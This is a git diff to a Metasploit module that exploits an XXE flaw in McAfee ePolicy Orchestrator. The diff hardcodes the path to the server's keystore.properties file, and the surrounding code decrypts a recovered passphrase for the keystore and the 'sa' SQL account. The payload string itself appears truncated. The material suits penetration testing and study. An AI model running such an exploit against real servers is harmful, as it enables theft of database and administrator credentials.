diff --git a/modules/auxiliary/gather/mcafee_epo_xxe.rb b/modules/auxiliary/gather/mcafee_epo_xxe.rb
index 02974573f1..aa93f21ac0 100644
--- a/modules/auxiliary/gather/mcafee_epo_xxe.rb
+++ b/modules/auxiliary/gather/mcafee_epo_xxe.rb
@@ -50,7 +50,6 @@ class Metasploit3 < Msf::Auxiliary
Opt::RPORT(8443),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('TARGETURI', [ true, "Base ePO directory path", '/']),
- OptString.new('FILEPATH', [true, "The filepath to read on the server", "C:/Program Files (x86)/McAfee/ePolicy Orchestrator/Server/conf/orion/keystore.properties"]),
OptString.new('USERNAME', [true, "The username to authenticate with", "username"]),
OptString.new('PASSWORD', [true, "The password to authenticate with", "password"])
], self.class)
@@ -205,7 +204,8 @@ class Metasploit3 < Msf::Auxiliary
print_status("Sending payload...")
- xxe = ']>OrionTaskLogTaskMessage.Messageeq&xxe;'
+ filepath = "C:/Program Files (x86)/McAfee/ePolicy Orchestrator/Server/conf/orion/keystore.properties"
+ xxe = ']>OrionTaskLogTaskMessage.Messageeq&xxe;'
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'core', 'orionUpdateTableFilter.do'),
@@ -255,7 +255,6 @@ class Metasploit3 < Msf::Auxiliary
passphrase = aes.update(Rex::Text.decode_base64(passphrase)) + aes.final
print_good("The decrypted password for the keystore, 'sa' SQL user (if using local instance), and possibly 'admin' is: " + passphrase)
-
end
end